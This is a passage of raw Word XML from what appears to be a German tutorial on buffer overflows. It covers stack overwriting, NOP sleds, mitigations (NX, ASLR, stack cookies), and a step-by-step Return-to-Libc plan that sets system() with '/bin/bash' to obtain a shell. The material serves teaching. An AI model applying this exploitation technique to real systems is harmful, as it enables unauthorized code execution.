    <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00BD07B0"/>
    <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00BD07B0"/>
    <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00BD07B0"/>
    <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00BD07B0"/>
    <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00513834"/>
    <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00513834"/>
    <w:p w:rsidR="00BD07B0" w:rsidRDefault="00BD07B0" w:rsidP="00513834"/>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc339281421"/>
      <w:r>
        <w:t>Durchführung</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17660B0C" wp14:editId="40C2783E">
            <wp:extent cx="5090905" cy="1747625"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080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_7_1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367" cy="175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A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Abbildung </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
        <w:r w:rsidR="00621AF0">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>überschreibung</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27378DC2" wp14:editId="19460519">
            <wp:extent cx="5138943" cy="1348760"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3810"/>
            <wp:docPr id="17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_7_2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7071" cy="1350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A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Abbildung </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
        <w:r w:rsidR="00621AF0">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nach der Überschreibung</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DB05787" wp14:editId="011AC0AC">
            <wp:extent cx="5024643" cy="846957"/>
            <wp:effectExtent l="0" t="0" r="5080" b="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_7_3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1519" cy="851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A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
        <w:sectPr w:rsidR="00C37A61" w:rsidSect="004D1933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>
        <w:t xml:space="preserve">Abbildung </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
        <w:r w:rsidR="00621AF0">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - Geöffnete Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc339281422"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Libc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61"/>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc339281423"/>
      <w:r>
        <w:t>NOP-Rutschen machen das Leben einfacherer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61"/>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:r>
        <w:object w:dxaOrig="12368" w:dyaOrig="5877">
          <v:shape id="_x0000_i1032" type="#_x0000_t75" style="width:618.75pt;height:293.55pt" o:ole="">
            <v:imagedata r:id="rId31" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1032" DrawAspect="Content" ObjectID="_1413023294" r:id="rId32"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:sectPr w:rsidR="00C37A61" w:rsidSect="00C37A61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C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc339281424"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Techniken um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Overflow zu verhindern</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61"/>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Programmierer schreiben sicheren Code mit Überprüfung der Speichergrenzen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OS Level Änderungen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NX (non-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>memory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ASLR (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Space Layout </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Randomization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Smashing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>protection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mithilfe von </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc339281425"/>
      <w:r>
        <w:t>Non-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Executable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00C37A61" w:rsidP="00C37A61"/>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="005C50BF" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Schutzmechanismus, mit dem Ziel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Overflows zu verhindern</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Die bekannteste Implementierung ist NX: Non-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Executable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Memory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Befehle auf dem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> können nicht ausgeführt werden</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Der </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kann weiterhin überschrieben werden</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Schützt den </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> selbst nicht</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="005C50BF">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc339281426"/>
      <w:r>
        <w:t xml:space="preserve">Return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Libc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="005C50BF"/>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="005C50BF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wenn wir den </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> überschreiben können, kontrollieren wir EIP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="005C50BF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wir wollen EIP auf etwas zeigen lassen, was für uns eine Shell (/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/) erstellt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="005C50BF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Warum EIP nicht in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zeigen lassen?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="005C50BF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>System() hilft uns eine Shell zu bekommen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="005C50BF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ist in den meisten Programmen im Speicherbereich abgebildet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="005C50BF">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc339281427"/>
      <w:r>
        <w:t>Was ist der Plan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="005C50BF"/>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="005C50BF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mit dem angreifbaren </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> überschreiben</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="005C50BF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() auf System()  in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zeigen lassen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="005C50BF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Argumente für System auf dem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> einrichten </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="005C50BF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Die nächste Adresse zeigt auf den Exit() Aufruf in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="005C50BF" w:rsidRDefault="005C50BF" w:rsidP="005C50BF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:sectPr w:rsidR="005C50BF" w:rsidSect="00C37A61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5C50BF" w:rsidRDefault="005954C8" w:rsidP="005954C8">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc339281428"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Wie nutzen wir das aus</w:t>
      </w:r>
      <w:r w:rsidR="00513834">
        <w:t xml:space="preserve"> und warum funktioniert es</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="005954C8" w:rsidRDefault="005954C8" w:rsidP="005954C8"/>
    <w:p w:rsidR="005954C8" w:rsidRDefault="005954C8" w:rsidP="005954C8">
      <w:pPr>
        <w:sectPr w:rsidR="005954C8" w:rsidSect="005C50BF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  <w:r>
        <w:object w:dxaOrig="12321" w:dyaOrig="6552">
          <v:shape id="_x0000_i1033" type="#_x0000_t75" style="width:616.35pt;height:327.55pt" o:ole="">
            <v:imagedata r:id="rId33" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1033" DrawAspect="Content" ObjectID="_1413023295" r:id="rId34"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00613FDF" w:rsidRDefault="00613FDF" w:rsidP="00613FDF"/>
    <w:p w:rsidR="00613FDF" w:rsidRDefault="00613FDF" w:rsidP="00613FDF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00613FDF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Ptr1 </w:t>
      </w:r>
      <w:r>
        <w:t>ist die Return Adresse nach dem die Main() Funktion beendet wurde</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00613FDF" w:rsidRDefault="00613FDF" w:rsidP="00613FDF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00613FDF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Ptr1 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00613FDF" w:rsidRDefault="00613FDF" w:rsidP="00613FDF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nächster Wert im </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> heißt </w:t>
      </w:r>
      <w:r w:rsidRPr="00613FDF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Ptr2 </w:t>
      </w:r>
      <w:r>
        <w:t>und ist die angenommene Return Adresse nach dem System() beendet wurde</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00613FDF" w:rsidRDefault="00613FDF" w:rsidP="00613FDF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dadurch wird nach dem System() beendet wurde </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() aufgerufen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00613FDF" w:rsidRDefault="00613FDF" w:rsidP="00613FDF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00613FDF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Ptr3 </w:t>
      </w:r>
      <w:r>
        <w:t>ist das übernommene Argument für System()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00613FDF" w:rsidRDefault="00613FDF" w:rsidP="00613FDF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00613FDF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Ptr3 </w:t>
      </w:r>
      <w:r>
        <w:t>zeigt auf „/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00613FDF" w:rsidRPr="00613FDF" w:rsidRDefault="00613FDF" w:rsidP="00613FDF">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dadurch aktiviert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() eine </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bashshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C37A61" w:rsidRDefault="00BD07B0" w:rsidP="00C37A61">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="9845" w:dyaOrig="7237">
          <v:shape id="_x0000_i1034" type="#_x0000_t75" style="width:453.35pt;height:333.1pt" o:ole="">
            <v:imagedata r:id="rId35" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1034" DrawAspect="Content" ObjectID="_1413023296" r:id="rId36"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00513834" w:rsidRDefault="0051383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BD07B0" w:rsidRDefault="00513834" w:rsidP="00513834">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc339281429"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Stackaufbau</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00513834" w:rsidRDefault="00513834" w:rsidP="00513834"/>
    <w:p w:rsidR="00513834" w:rsidRDefault="00513834" w:rsidP="00513834">
      <w:r>
        <w:object w:dxaOrig="7660" w:dyaOrig="6482">
          <v:shape id="_x0000_i1035" type="#_x0000_t75" style="width:333.1pt;height:281.65pt" o:ole="">
            <v:imagedata r:id="rId37" o:title=""/>
